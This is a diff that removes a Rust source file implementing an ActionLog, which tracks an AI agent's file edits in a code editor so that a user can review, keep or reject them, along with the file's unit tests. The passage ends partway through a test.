@@ -use anyhow::{Context as _, Result}; -use buffer_diff::BufferDiff; -use collections::BTreeMap; 
-use futures::{StreamExt, channel::mpsc}; -use gpui::{App, AppContext, AsyncApp, Context, Entity, Subscription, Task, WeakEntity}; -use language::{Anchor, Buffer, BufferEvent, DiskState, Point, ToPoint}; -use project::{Project, ProjectItem, lsp_store::OpenLspBufferHandle}; -use std::{cmp, ops::Range, sync::Arc}; -use text::{Edit, Patch, Rope}; -use util::RangeExt; - -/// Tracks actions performed by tools in a thread -pub struct ActionLog { - /// Buffers that we want to notify the model about when they change. - tracked_buffers: BTreeMap, TrackedBuffer>, - /// Has the model edited a file since it last checked diagnostics? - edited_since_project_diagnostics_check: bool, - /// The project this action log is associated with - project: Entity, -} - -impl ActionLog { - /// Creates a new, empty action log associated with the given project. - pub fn new(project: Entity) -> Self { - Self { - tracked_buffers: BTreeMap::default(), - edited_since_project_diagnostics_check: false, - project, - } - } - - pub fn project(&self) -> &Entity { - &self.project - } - - /// Notifies a diagnostics check - pub fn checked_project_diagnostics(&mut self) { - self.edited_since_project_diagnostics_check = false; - } - - /// Returns true if any files have been edited since the last project diagnostics check - pub fn has_edited_files_since_project_diagnostics_check(&self) -> bool { - self.edited_since_project_diagnostics_check - } - - fn track_buffer_internal( - &mut self, - buffer: Entity, - is_created: bool, - cx: &mut Context, - ) -> &mut TrackedBuffer { - let tracked_buffer = self - .tracked_buffers - .entry(buffer.clone()) - .or_insert_with(|| { - let open_lsp_handle = self.project.update(cx, |project, cx| { - project.register_buffer_with_language_servers(&buffer, cx) - }); - - let text_snapshot = buffer.read(cx).text_snapshot(); - let diff = cx.new(|cx| BufferDiff::new(&text_snapshot, cx)); - let (diff_update_tx, diff_update_rx) = mpsc::unbounded(); - let base_text; - let status; - let 
unreviewed_changes; - if is_created { - base_text = Rope::default(); - status = TrackedBufferStatus::Created; - unreviewed_changes = Patch::new(vec![Edit { - old: 0..1, - new: 0..text_snapshot.max_point().row + 1, - }]) - } else { - base_text = buffer.read(cx).as_rope().clone(); - status = TrackedBufferStatus::Modified; - unreviewed_changes = Patch::default(); - } - TrackedBuffer { - buffer: buffer.clone(), - base_text, - unreviewed_changes, - snapshot: text_snapshot.clone(), - status, - version: buffer.read(cx).version(), - diff, - diff_update: diff_update_tx, - _open_lsp_handle: open_lsp_handle, - _maintain_diff: cx.spawn({ - let buffer = buffer.clone(); - async move |this, cx| { - Self::maintain_diff(this, buffer, diff_update_rx, cx) - .await - .ok(); - } - }), - _subscription: cx.subscribe(&buffer, Self::handle_buffer_event), - } - }); - tracked_buffer.version = buffer.read(cx).version(); - tracked_buffer - } - - fn handle_buffer_event( - &mut self, - buffer: Entity, - event: &BufferEvent, - cx: &mut Context, - ) { - match event { - BufferEvent::Edited { .. } => self.handle_buffer_edited(buffer, cx), - BufferEvent::FileHandleChanged => { - self.handle_buffer_file_changed(buffer, cx); - } - _ => {} - }; - } - - fn handle_buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { - let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { - return; - }; - tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); - } - - fn handle_buffer_file_changed(&mut self, buffer: Entity, cx: &mut Context) { - let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { - return; - }; - - match tracked_buffer.status { - TrackedBufferStatus::Created | TrackedBufferStatus::Modified => { - if buffer - .read(cx) - .file() - .map_or(false, |file| file.disk_state() == DiskState::Deleted) - { - // If the buffer had been edited by a tool, but it got - // deleted externally, we want to stop tracking it. 
- self.tracked_buffers.remove(&buffer); - } - cx.notify(); - } - TrackedBufferStatus::Deleted => { - if buffer - .read(cx) - .file() - .map_or(false, |file| file.disk_state() != DiskState::Deleted) - { - // If the buffer had been deleted by a tool, but it got - // resurrected externally, we want to clear the changes we - // were tracking and reset the buffer's state. - self.tracked_buffers.remove(&buffer); - self.track_buffer_internal(buffer, false, cx); - } - cx.notify(); - } - } - } - - async fn maintain_diff( - this: WeakEntity, - buffer: Entity, - mut diff_update: mpsc::UnboundedReceiver<(ChangeAuthor, text::BufferSnapshot)>, - cx: &mut AsyncApp, - ) -> Result<()> { - while let Some((author, buffer_snapshot)) = diff_update.next().await { - let (rebase, diff, language, language_registry) = - this.read_with(cx, |this, cx| { - let tracked_buffer = this - .tracked_buffers - .get(&buffer) - .context("buffer not tracked")?; - - let rebase = cx.background_spawn({ - let mut base_text = tracked_buffer.base_text.clone(); - let old_snapshot = tracked_buffer.snapshot.clone(); - let new_snapshot = buffer_snapshot.clone(); - let unreviewed_changes = tracked_buffer.unreviewed_changes.clone(); - async move { - let edits = diff_snapshots(&old_snapshot, &new_snapshot); - if let ChangeAuthor::User = author { - apply_non_conflicting_edits( - &unreviewed_changes, - edits, - &mut base_text, - new_snapshot.as_rope(), - ); - } - (Arc::new(base_text.to_string()), base_text) - } - }); - - anyhow::Ok(( - rebase, - tracked_buffer.diff.clone(), - tracked_buffer.buffer.read(cx).language().cloned(), - tracked_buffer.buffer.read(cx).language_registry(), - )) - })??; - - let (new_base_text, new_base_text_rope) = rebase.await; - let diff_snapshot = BufferDiff::update_diff( - diff.clone(), - buffer_snapshot.clone(), - Some(new_base_text), - true, - false, - language, - language_registry, - cx, - ) - .await; - - let mut unreviewed_changes = Patch::default(); - if let Ok(diff_snapshot) = 
diff_snapshot { - unreviewed_changes = cx - .background_spawn({ - let diff_snapshot = diff_snapshot.clone(); - let buffer_snapshot = buffer_snapshot.clone(); - let new_base_text_rope = new_base_text_rope.clone(); - async move { - let mut unreviewed_changes = Patch::default(); - for hunk in diff_snapshot.hunks_intersecting_range( - Anchor::MIN..Anchor::MAX, - &buffer_snapshot, - ) { - let old_range = new_base_text_rope - .offset_to_point(hunk.diff_base_byte_range.start) - ..new_base_text_rope - .offset_to_point(hunk.diff_base_byte_range.end); - let new_range = hunk.range.start..hunk.range.end; - unreviewed_changes.push(point_to_row_edit( - Edit { - old: old_range, - new: new_range, - }, - &new_base_text_rope, - &buffer_snapshot.as_rope(), - )); - } - unreviewed_changes - } - }) - .await; - - diff.update(cx, |diff, cx| { - diff.set_snapshot(diff_snapshot, &buffer_snapshot, cx) - })?; - } - this.update(cx, |this, cx| { - let tracked_buffer = this - .tracked_buffers - .get_mut(&buffer) - .context("buffer not tracked")?; - tracked_buffer.base_text = new_base_text_rope; - tracked_buffer.snapshot = buffer_snapshot; - tracked_buffer.unreviewed_changes = unreviewed_changes; - cx.notify(); - anyhow::Ok(()) - })??; - } - - Ok(()) - } - - /// Track a buffer as read, so we can notify the model about user edits. 
- pub fn buffer_read(&mut self, buffer: Entity, cx: &mut Context) { - self.track_buffer_internal(buffer, false, cx); - } - - /// Mark a buffer as edited, so we can refresh it in the context - pub fn buffer_created(&mut self, buffer: Entity, cx: &mut Context) { - self.edited_since_project_diagnostics_check = true; - self.tracked_buffers.remove(&buffer); - self.track_buffer_internal(buffer.clone(), true, cx); - } - - /// Mark a buffer as edited, so we can refresh it in the context - pub fn buffer_edited(&mut self, buffer: Entity, cx: &mut Context) { - self.edited_since_project_diagnostics_check = true; - - let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); - if let TrackedBufferStatus::Deleted = tracked_buffer.status { - tracked_buffer.status = TrackedBufferStatus::Modified; - } - tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); - } - - pub fn will_delete_buffer(&mut self, buffer: Entity, cx: &mut Context) { - let tracked_buffer = self.track_buffer_internal(buffer.clone(), false, cx); - match tracked_buffer.status { - TrackedBufferStatus::Created => { - self.tracked_buffers.remove(&buffer); - cx.notify(); - } - TrackedBufferStatus::Modified => { - buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); - tracked_buffer.status = TrackedBufferStatus::Deleted; - tracked_buffer.schedule_diff_update(ChangeAuthor::Agent, cx); - } - TrackedBufferStatus::Deleted => {} - } - cx.notify(); - } - - pub fn keep_edits_in_range( - &mut self, - buffer: Entity, - buffer_range: Range, - cx: &mut Context, - ) { - let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { - return; - }; - - match tracked_buffer.status { - TrackedBufferStatus::Deleted => { - self.tracked_buffers.remove(&buffer); - cx.notify(); - } - _ => { - let buffer = buffer.read(cx); - let buffer_range = - buffer_range.start.to_point(buffer)..buffer_range.end.to_point(buffer); - let mut delta = 0i32; - - tracked_buffer.unreviewed_changes.retain_mut(|edit| { - 
edit.old.start = (edit.old.start as i32 + delta) as u32; - edit.old.end = (edit.old.end as i32 + delta) as u32; - - if buffer_range.end.row < edit.new.start - || buffer_range.start.row > edit.new.end - { - true - } else { - let old_range = tracked_buffer - .base_text - .point_to_offset(Point::new(edit.old.start, 0)) - ..tracked_buffer.base_text.point_to_offset(cmp::min( - Point::new(edit.old.end, 0), - tracked_buffer.base_text.max_point(), - )); - let new_range = tracked_buffer - .snapshot - .point_to_offset(Point::new(edit.new.start, 0)) - ..tracked_buffer.snapshot.point_to_offset(cmp::min( - Point::new(edit.new.end, 0), - tracked_buffer.snapshot.max_point(), - )); - tracked_buffer.base_text.replace( - old_range, - &tracked_buffer - .snapshot - .text_for_range(new_range) - .collect::(), - ); - delta += edit.new_len() as i32 - edit.old_len() as i32; - false - } - }); - tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); - } - } - } - - pub fn reject_edits_in_ranges( - &mut self, - buffer: Entity, - buffer_ranges: Vec>, - cx: &mut Context, - ) -> Task> { - let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else { - return Task::ready(Ok(())); - }; - - match tracked_buffer.status { - TrackedBufferStatus::Created => { - let delete = buffer - .read(cx) - .entry_id(cx) - .and_then(|entry_id| { - self.project - .update(cx, |project, cx| project.delete_entry(entry_id, false, cx)) - }) - .unwrap_or(Task::ready(Ok(()))); - self.tracked_buffers.remove(&buffer); - cx.notify(); - delete - } - TrackedBufferStatus::Deleted => { - buffer.update(cx, |buffer, cx| { - buffer.set_text(tracked_buffer.base_text.to_string(), cx) - }); - let save = self - .project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)); - - // Clear all tracked changes for this buffer and start over as if we just read it. 
- self.tracked_buffers.remove(&buffer); - self.buffer_read(buffer.clone(), cx); - cx.notify(); - save - } - TrackedBufferStatus::Modified => { - buffer.update(cx, |buffer, cx| { - let mut buffer_row_ranges = buffer_ranges - .into_iter() - .map(|range| { - range.start.to_point(buffer).row..range.end.to_point(buffer).row - }) - .peekable(); - - let mut edits_to_revert = Vec::new(); - for edit in tracked_buffer.unreviewed_changes.edits() { - let new_range = tracked_buffer - .snapshot - .anchor_before(Point::new(edit.new.start, 0)) - ..tracked_buffer.snapshot.anchor_after(cmp::min( - Point::new(edit.new.end, 0), - tracked_buffer.snapshot.max_point(), - )); - let new_row_range = new_range.start.to_point(buffer).row - ..new_range.end.to_point(buffer).row; - - let mut revert = false; - while let Some(buffer_row_range) = buffer_row_ranges.peek() { - if buffer_row_range.end < new_row_range.start { - buffer_row_ranges.next(); - } else if buffer_row_range.start > new_row_range.end { - break; - } else { - revert = true; - break; - } - } - - if revert { - let old_range = tracked_buffer - .base_text - .point_to_offset(Point::new(edit.old.start, 0)) - ..tracked_buffer.base_text.point_to_offset(cmp::min( - Point::new(edit.old.end, 0), - tracked_buffer.base_text.max_point(), - )); - let old_text = tracked_buffer - .base_text - .chunks_in_range(old_range) - .collect::(); - edits_to_revert.push((new_range, old_text)); - } - } - - buffer.edit(edits_to_revert, None, cx); - }); - self.project - .update(cx, |project, cx| project.save_buffer(buffer, cx)) - } - } - } - - pub fn keep_all_edits(&mut self, cx: &mut Context) { - self.tracked_buffers - .retain(|_buffer, tracked_buffer| match tracked_buffer.status { - TrackedBufferStatus::Deleted => false, - _ => { - tracked_buffer.unreviewed_changes.clear(); - tracked_buffer.base_text = tracked_buffer.snapshot.as_rope().clone(); - tracked_buffer.schedule_diff_update(ChangeAuthor::User, cx); - true - } - }); - cx.notify(); - } - - /// Returns 
the set of buffers that contain changes that haven't been reviewed by the user. - pub fn changed_buffers(&self, cx: &App) -> BTreeMap, Entity> { - self.tracked_buffers - .iter() - .filter(|(_, tracked)| tracked.has_changes(cx)) - .map(|(buffer, tracked)| (buffer.clone(), tracked.diff.clone())) - .collect() - } - - /// Iterate over buffers changed since last read or edited by the model - pub fn stale_buffers<'a>(&'a self, cx: &'a App) -> impl Iterator> { - self.tracked_buffers - .iter() - .filter(|(buffer, tracked)| { - let buffer = buffer.read(cx); - - tracked.version != buffer.version - && buffer - .file() - .map_or(false, |file| file.disk_state() != DiskState::Deleted) - }) - .map(|(buffer, _)| buffer) - } -} - -fn apply_non_conflicting_edits( - patch: &Patch, - edits: Vec>, - old_text: &mut Rope, - new_text: &Rope, -) { - let mut old_edits = patch.edits().iter().cloned().peekable(); - let mut new_edits = edits.into_iter().peekable(); - let mut applied_delta = 0i32; - let mut rebased_delta = 0i32; - - while let Some(mut new_edit) = new_edits.next() { - let mut conflict = false; - - // Push all the old edits that are before this new edit or that intersect with it. 
- while let Some(old_edit) = old_edits.peek() { - if new_edit.old.end < old_edit.new.start - || (!old_edit.new.is_empty() && new_edit.old.end == old_edit.new.start) - { - break; - } else if new_edit.old.start > old_edit.new.end - || (!old_edit.new.is_empty() && new_edit.old.start == old_edit.new.end) - { - let old_edit = old_edits.next().unwrap(); - rebased_delta += old_edit.new_len() as i32 - old_edit.old_len() as i32; - } else { - conflict = true; - if new_edits - .peek() - .map_or(false, |next_edit| next_edit.old.overlaps(&old_edit.new)) - { - new_edit = new_edits.next().unwrap(); - } else { - let old_edit = old_edits.next().unwrap(); - rebased_delta += old_edit.new_len() as i32 - old_edit.old_len() as i32; - } - } - } - - if !conflict { - // This edit doesn't intersect with any old edit, so we can apply it to the old text. - new_edit.old.start = (new_edit.old.start as i32 + applied_delta - rebased_delta) as u32; - new_edit.old.end = (new_edit.old.end as i32 + applied_delta - rebased_delta) as u32; - let old_bytes = old_text.point_to_offset(Point::new(new_edit.old.start, 0)) - ..old_text.point_to_offset(cmp::min( - Point::new(new_edit.old.end, 0), - old_text.max_point(), - )); - let new_bytes = new_text.point_to_offset(Point::new(new_edit.new.start, 0)) - ..new_text.point_to_offset(cmp::min( - Point::new(new_edit.new.end, 0), - new_text.max_point(), - )); - - old_text.replace( - old_bytes, - &new_text.chunks_in_range(new_bytes).collect::(), - ); - applied_delta += new_edit.new_len() as i32 - new_edit.old_len() as i32; - } - } -} - -fn diff_snapshots( - old_snapshot: &text::BufferSnapshot, - new_snapshot: &text::BufferSnapshot, -) -> Vec> { - let mut edits = new_snapshot - .edits_since::(&old_snapshot.version) - .map(|edit| point_to_row_edit(edit, old_snapshot.as_rope(), new_snapshot.as_rope())) - .peekable(); - let mut row_edits = Vec::new(); - while let Some(mut edit) = edits.next() { - while let Some(next_edit) = edits.peek() { - if edit.old.end >= 
next_edit.old.start { - edit.old.end = next_edit.old.end; - edit.new.end = next_edit.new.end; - edits.next(); - } else { - break; - } - } - row_edits.push(edit); - } - row_edits -} - -fn point_to_row_edit(edit: Edit, old_text: &Rope, new_text: &Rope) -> Edit { - if edit.old.start.column == old_text.line_len(edit.old.start.row) - && new_text - .chars_at(new_text.point_to_offset(edit.new.start)) - .next() - == Some('\n') - && edit.old.start != old_text.max_point() - { - Edit { - old: edit.old.start.row + 1..edit.old.end.row + 1, - new: edit.new.start.row + 1..edit.new.end.row + 1, - } - } else if edit.old.start.column == 0 - && edit.old.end.column == 0 - && edit.new.end.column == 0 - && edit.old.end != old_text.max_point() - { - Edit { - old: edit.old.start.row..edit.old.end.row, - new: edit.new.start.row..edit.new.end.row, - } - } else { - Edit { - old: edit.old.start.row..edit.old.end.row + 1, - new: edit.new.start.row..edit.new.end.row + 1, - } - } -} - -#[derive(Copy, Clone, Debug)] -enum ChangeAuthor { - User, - Agent, -} - -#[derive(Copy, Clone, Eq, PartialEq)] -enum TrackedBufferStatus { - Created, - Modified, - Deleted, -} - -struct TrackedBuffer { - buffer: Entity, - base_text: Rope, - unreviewed_changes: Patch, - status: TrackedBufferStatus, - version: clock::Global, - diff: Entity, - snapshot: text::BufferSnapshot, - diff_update: mpsc::UnboundedSender<(ChangeAuthor, text::BufferSnapshot)>, - _open_lsp_handle: OpenLspBufferHandle, - _maintain_diff: Task<()>, - _subscription: Subscription, -} - -impl TrackedBuffer { - fn has_changes(&self, cx: &App) -> bool { - self.diff - .read(cx) - .hunks(&self.buffer.read(cx), cx) - .next() - .is_some() - } - - fn schedule_diff_update(&self, author: ChangeAuthor, cx: &App) { - self.diff_update - .unbounded_send((author, self.buffer.read(cx).text_snapshot())) - .ok(); - } -} - -pub struct ChangedBuffer { - pub diff: Entity, -} - -#[cfg(test)] -mod tests { - use std::env; - - use super::*; - use 
buffer_diff::DiffHunkStatusKind; - use gpui::TestAppContext; - use language::Point; - use project::{FakeFs, Fs, Project, RemoveOptions}; - use rand::prelude::*; - use serde_json::json; - use settings::SettingsStore; - use util::{RandomCharIter, path}; - - #[ctor::ctor] - fn init_logger() { - zlog::init_test(); - } - - fn init_test(cx: &mut TestAppContext) { - cx.update(|cx| { - let settings_store = SettingsStore::test(cx); - cx.set_global(settings_store); - language::init(cx); - Project::init_settings(cx); - }); - } - - #[gpui::test(iterations = 10)] - async fn test_keep_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 1)..Point::new(1, 2), "E")], None, cx) - .unwrap() - }); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(4, 2)..Point::new(4, 3), "O")], None, cx) - .unwrap() - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndEf\nghi\njkl\nmnO" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 0)..Point::new(2, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(4, 0)..Point::new(4, 3), - diff_status: DiffHunkStatusKind::Modified, - 
old_text: "mno".into(), - } - ], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), Point::new(3, 0)..Point::new(4, 3), cx) - }); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(1, 0)..Point::new(2, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\n".into(), - }], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), Point::new(0, 0)..Point::new(4, 3), cx) - }); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_deletions(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/dir"), - json!({"file": "abc\ndef\nghi\njkl\nmno\npqr"}), - ) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 0)..Point::new(2, 0), "")], None, cx) - .unwrap(); - buffer.finalize_last_transaction(); - }); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(3, 0)..Point::new(4, 0), "")], None, cx) - .unwrap(); - buffer.finalize_last_transaction(); - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\nghi\njkl\npqr" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![ - HunkStatus { - range: Point::new(1, 
0)..Point::new(1, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "def\n".into(), - }, - HunkStatus { - range: Point::new(3, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "mno\n".into(), - } - ], - )] - ); - - buffer.update(cx, |buffer, cx| buffer.undo(cx)); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\nghi\njkl\nmno\npqr" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(1, 0)..Point::new(1, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "def\n".into(), - }], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), Point::new(1, 0)..Point::new(1, 0), cx) - }); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_overlapping_user_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 2)..Point::new(2, 3), "F\nGHI")], None, cx) - .unwrap() - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abc\ndeF\nGHI\njkl\nmno" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - 
vec![HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\nghi\n".into(), - }], - )] - ); - - buffer.update(cx, |buffer, cx| { - buffer.edit( - [ - (Point::new(0, 2)..Point::new(0, 2), "X"), - (Point::new(3, 0)..Point::new(3, 0), "Y"), - ], - None, - cx, - ) - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abXc\ndeF\nGHI\nYjkl\nmno" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\nghi\n".into(), - }], - )] - ); - - buffer.update(cx, |buffer, cx| { - buffer.edit([(Point::new(1, 1)..Point::new(1, 1), "Z")], None, cx) - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - "abXc\ndZeF\nGHI\nYjkl\nmno" - ); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(1, 0)..Point::new(3, 0), - diff_status: DiffHunkStatusKind::Modified, - old_text: "def\nghi\n".into(), - }], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), Point::new(0, 0)..Point::new(1, 0), cx) - }); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_creating_files(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({})).await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file1", cx)) - .unwrap(); - - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - cx.update(|cx| { - action_log.update(cx, |log, 
cx| log.buffer_created(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| buffer.set_text("lorem", cx)); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 5), - diff_status: DiffHunkStatusKind::Added, - old_text: "".into(), - }], - )] - ); - - buffer.update(cx, |buffer, cx| buffer.edit([(0..0, "X")], None, cx)); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 6), - diff_status: DiffHunkStatusKind::Added, - old_text: "".into(), - }], - )] - ); - - action_log.update(cx, |log, cx| { - log.keep_edits_in_range(buffer.clone(), 0..5, cx) - }); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_deleting_files(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/dir"), - json!({"file1": "lorem\n", "file2": "ipsum\n"}), - ) - .await; - - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let file1_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file1", cx)) - .unwrap(); - let file2_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file2", cx)) - .unwrap(); - - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let buffer1 = project - .update(cx, |project, cx| { - project.open_buffer(file1_path.clone(), cx) - }) - .await - .unwrap(); - let buffer2 = project - .update(cx, |project, cx| { - project.open_buffer(file2_path.clone(), cx) - }) - .await - .unwrap(); - - action_log.update(cx, |log, cx| 
log.will_delete_buffer(buffer1.clone(), cx)); - action_log.update(cx, |log, cx| log.will_delete_buffer(buffer2.clone(), cx)); - project - .update(cx, |project, cx| { - project.delete_file(file1_path.clone(), false, cx) - }) - .unwrap() - .await - .unwrap(); - project - .update(cx, |project, cx| { - project.delete_file(file2_path.clone(), false, cx) - }) - .unwrap() - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![ - ( - buffer1.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "lorem\n".into(), - }] - ), - ( - buffer2.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 0), - diff_status: DiffHunkStatusKind::Deleted, - old_text: "ipsum\n".into(), - }], - ) - ] - ); - - // Simulate file1 being recreated externally. - fs.insert_file(path!("/dir/file1"), "LOREM".as_bytes().to_vec()) - .await; - - // Simulate file2 being recreated by a tool. - let buffer2 = project - .update(cx, |project, cx| project.open_buffer(file2_path, cx)) - .await - .unwrap(); - action_log.update(cx, |log, cx| log.buffer_read(buffer2.clone(), cx)); - buffer2.update(cx, |buffer, cx| buffer.set_text("IPSUM", cx)); - action_log.update(cx, |log, cx| log.buffer_edited(buffer2.clone(), cx)); - project - .update(cx, |project, cx| project.save_buffer(buffer2.clone(), cx)) - .await - .unwrap(); - - cx.run_until_parked(); - assert_eq!( - unreviewed_hunks(&action_log, cx), - vec![( - buffer2.clone(), - vec![HunkStatus { - range: Point::new(0, 0)..Point::new(0, 5), - diff_status: DiffHunkStatusKind::Modified, - old_text: "ipsum\n".into(), - }], - )] - ); - - // Simulate file2 being deleted externally. 
- fs.remove_file(path!("/dir/file2").as_ref(), RemoveOptions::default()) - .await - .unwrap(); - cx.run_until_parked(); - assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); - } - - #[gpui::test(iterations = 10)] - async fn test_reject_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree(path!("/dir"), json!({"file": "abc\ndef\nghi\njkl\nmno"})) - .await; - let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; - let action_log = cx.new(|_| ActionLog::new(project.clone())); - let file_path = project - .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) - .unwrap(); - let buffer = project - .update(cx, |project, cx| project.open_buffer(file_path, cx)) - .await - .unwrap(); - - cx.update(|cx| { - action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(1, 1)..Point::new(1, 2), "E\nXYZ")], None, cx) - .unwrap() - }); - buffer.update(cx, |buffer, cx| { - buffer - .edit([(Point::new(5, 2)..Point::new(5, 3), "O")], None, cx) - .unwrap() - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.text()), - 